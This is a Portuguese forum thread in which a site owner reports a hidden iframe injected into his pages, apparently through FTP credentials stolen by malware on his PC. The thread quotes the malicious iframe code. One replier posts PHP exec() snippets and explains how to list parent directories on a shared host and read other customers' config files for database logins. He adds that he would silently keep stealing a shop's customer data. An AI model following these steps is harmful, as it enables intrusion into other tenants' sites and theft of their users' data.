[Resolvido] Iframe com virus aparecendo no meu site

[AyrtonMaia 0]

Olá, estou com uma dúvida. Não sei se isso é vocês que podem responder, o problema é o seguinte:

No meu site sempre aparece um iframe de um contador do googleadsense.biz em todas as páginas, eu já tirei este iframe manualmente várias vezes mais ele continua a aparecer. Quando o pessoal acessa o site o anti-virus deles alerta sobre virus no site e se realmente for virus este virus se encontra neste iframe do google pois todo o site foi feito por mim e garanto que não coloquei nenhum tipo de virus no site até porque não entendo de virus nem coisas do tipo. o codigo do iframe é <iframe src="http://goooogleadsence.biz/?click=129802" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

o meu site é www.habbofly.net e minha hospedagem é paga

[~TiuTalk~ 7]

Provavelmente o "virus" estava no computador de quem inseriu conteudo no site. Esse iframe tá em algum lugar do banco de dados ou outro lugar onde as informações do site são salvas para depois serem exibidas no site.. :)

[hinom 5]

o "código malicioso" também aparece no seu ambiente de desenvolvimento ?

ou somente quando está no servidor de hospedagem ?

[AyrtonMaia 0]

somente na no servidor da hospedagem

mais no cpanel tem algum tipo de anti virus pra passa no site?

[hinom 5]

1. o "vírus" está no servidor de hospedagem somente

2. você comentou que o host trabalha com .net, então, provavelmente os servers são.. windows

3. windows é alvo de virus

4. o suporte respondeu dizendo que nao sabe php (tirando o corpo fora pra nao resolver um problema)

 

conclusão: o host é mal administrado.

procure outro host

[Otata 4]

sem dúvida mude de host , e que seja linux...

[AyrtonMaia 0]

A hospedagem é linux

PHP version 5.2.5

Apache version 2.2.8 (Unix)

 

será mesmo esse o motivo?

[hinom 5]

1. existem virus para linux também

3. está usando banco de dados ?

4. pode ter acontecido algum sql injection

5. ou talvez um php injection

6. o host é compartilhado ?

7. você comentou que o pessoal do host não entende php, entretanto oferecem serviço PHP.. isso é perigodo e torna o serviço vulnerável. Verifique por questões básicas de segurança, tais como:

- navegação em diretórios acima do root

- permissões para executar funções de acesso ao shell do sistema operacional (exec, passthru, etc..)

[AyrtonMaia 0]

RE 3: Sim, no serviço da hospedagem tem Mysql, PostGre.

RE 4 E 5: Não entendo ainda de PHP INJECTION e MYSQL INJECTION

re 6: Como assim compartilhado?

[hinom 5]

PHP INJECTION e MYSQL INJECTION

pesquise pelos termos e encontrará respostas sobre o que é.

 

Como assim compartilhado?

"servidor de hospedagem compartilhado"

 

as empresas de hospedagem, para baratear o custo final de um determinado serviço, oferecem servidores compartilhados.

num servidor compartilhado podem conter vários outros clientes.

 

se o servidor é mal configurado, qualquer cliente com um pouco de conhecimento em programação web pode consegue obter dados de todos os outros clientes dentro do server.

 

por isso perguntei se o seu plano de hospedagem está num server compartilhado.

há possibilidade de ser compartilhado e haver um cliente terceiro enviando scripts maliciosos ou mesmo ter instalado um virus no server..

 

são apenas hipóteses, você, como desenvolvedor web deve estar atento a essas questões para sua própria segurança.

 

uma coisa é certa..

se você tem certeza que os seus arquivos estão limpos

o seu provedor de hospedagem é que está com problema. E se eles fazem vista grossa pra isso, é melhor procurar um host confiável.

[AyrtonMaia 0]

Não sei mais acho que seja mesmo algum outro cliente da empresa que esteja enviando scripts maliciosos para o servidor. Até porque confio muito na empresa que está fornecendo a hospedagem do meu site, vou falar com eles e tenho certeza que eles conseguirão resolver este problema.

[hinom 5]

execute isso no server

 

<?php

print_r( exec( 'ping www.google.com' ) );

?>

se permitir o uso do exec.. pode ter certeza que tem falhas graves

[visitante_php 0]

kual eh hospedagem..? no meu caso o d minha empresausa a locaeb, tida por muitos coo melhor etc..no enentopermitiu inserir codigos maliciosos no site da minha empresa....

[AyrtonMaia 0]

Enquanto o nome da empresa prefiro não falar para não compremeter. Isso pode ser só uma falha no servidor mais pelo menos a empresa é ótima. Tenho um amigo que tem um site Hospedado nesta empresa áh mais ou menos três anos e nunca teve problemas deste tipo.

[hinom 5]

nao precisa citar nomes

 

apenas faça testes para comprovar o nivel de segurança.

fez algum teste sugerido ?

 

quanto a credibilidade do host

 

uma empresa de hospedagem pode ter varios servers.

um server pode estar bem configurado e outro não..

[georgewar 1]

execute isso no server

 

<?php

print_r( exec( 'ping www.google.com' ) );

?>

se permitir o uso do exec.. pode ter certeza que tem falhas graves

Desculpe, mas agora você falou uma baita besteira. Exec executa um comando no shell, pode ser um ping, mas não um "apt get install".

A segurança do servidor deve ter um conceito um pouco alem desse, ao invez de simplesmente sair bloqueando tudo!

[hinom 5]

Desculpe, mas agora você falou uma baita besteira. Exec executa um comando no shell, pode ser um ping, mas não um "apt get install".

A segurança do servidor deve ter um conceito um pouco alem desse, ao invez de simplesmente sair bloqueando tudo!

apenas citei exemplo simples e práticos para o autor do tópico, que é iniciante na linguagem PHP..

 

não há necessidade e não é conveniente escrever uma bíblia detalhando todos os aspectos e prospectos sobre segurança...

[AyrtonMaia 0]

Na verdade eu acho que já sei de onde bem o problema. O problema parece ser vírus no meu próprio computador, procurei bastante pela Internet e achei alguns tópicos em fórums falando sobre este assunto e na maioria deles era dito que o vírus vinha do meu próprio computador porém fiquei com minhas dúvidas porque ex:

eu apago o site inteiro do servidor e após isso envio a cópia do site que estava no meu computador (cópia que está totalmente limpa de qualquer tipo de vírus) então o vírus só aparece horas depois no site. Em alguns tópicos achei pessoas dizendo que este vírus age da seguinte forma: toda vez que eu me conecto ao Cpanel ou ao FTP do meu site o vírus age silenciosamente pegando a senha e o login de acesso, após isso ele entra no servidor do site e põe os iframes.

 

e agora tenho mais uma dúvida. hinom, o que faz este código que você pediu para eu executar no servidor? eu ainda não pude executá-lo no server porque não posso acessar o FTP se não o vírus entra no site.

[hinom 5]

1. qual software FTP possui instalado ?

 

2. o software ftp é crackeado ?

 

3. possui programas piratas no pc ?

 

4. consulte o forum segurança e malwares examinar o seu pc em busca de virus

 

 

 

hinom, o que faz este código que você pediu para eu executar no servidor?

nada de mais.. a função EXEC executa uma linha de comando no shell do server.

 

apenas para você ter uma noção e extendendo um pouco o assunto,

 

 

exemplo em ambiente windows (os comandos são os mesmo em ambiente *nix)

 

Iniciar - executar: CMD (pressione ENTER)

isso abrirá o prompt do ms-dos

digite nele

ping www.google.com

será feito um "ping" no DNS google.com e retornará o tempo de resposta se estiver no ar.

 

isso é um mero exemplo apenas para saber se a função exec está ativada para uso via PHP

 

com PHP, o mesmo processo acima pode ser feito do seguinte modo:

 

 

<?php
exec( "ping www.google.com" );
?>

para que o resultado seja impresso na tela

 

<?php
$rs = exec( "ping www.google.com" );
print_r( $rs );
?>

ok.

isso não comprova se o servidor é vulnerável ou não, entretanto, se funcionar há grande possibilidade de executar outros comandos

 

<?php
$rs = exec( "dir .." );
print_r( $rs );
?>

o comando

dir ..

retornará listagem de arquivos de um diretório acima.

se funcionar, tente entrar em diretorios mais acima

 

 

num server compartilhado, geralmente os sites ficam dispostos numa mesma estrutura.

exemplo:

 

c:/www/site/site.com.br

c:/www/site/site2.com.br

c:/www/site/site3.com.br

 

supondo-se que o seu é o site.com.br

 

você então descobriu que consegue executar comandos pelo shell

e descobriu também que o server permite recuo de diretorios

 

então, basta ler onde estão os outros sites

 

<?php
$rs = exec( "dir .." );
print_r( $rs );
?>

isso vai listar os nomes das outras pastas.

agora basta entrar em cada uma delas vasculhando , por exemplo, arquivos de configuração, onde geralmente é colocado o login e senha do banco de dados, além de outros dados sensíveis.

 

vamos supor que o site2.com.br seja uma loja virtual com 100 mil clientes ativos.

o que você faria com esses dados ?

 

1. apagaria para o dono perceber e corrigir ?

2. ficaria quieto usando um script silencioso para continuar sugando os dados sem ninguém perceber ?

 

eu faria a segunda opção com certeza

[AyrtonMaia 0]

Ah tah, entendi então. Resumindo: o comando exec ele executa as mesmas funções que a gente pode fazer no CMD do windows. correto?

 

E respondendo as suas perguntas...

O Software FTP que eu uso é o Filezilla e não tenho programas piratas no computador.

Já faz alguns dias que eu passo um SCAM do Mawarebites E ele achou alguns vírus e mesmo assim eu ja os retirei do computador mais vou fazer o que voce falo mesmo. Vou na seção de malwares do fórum pra ver se o pessoal acha algo. Obrigado pela ajuda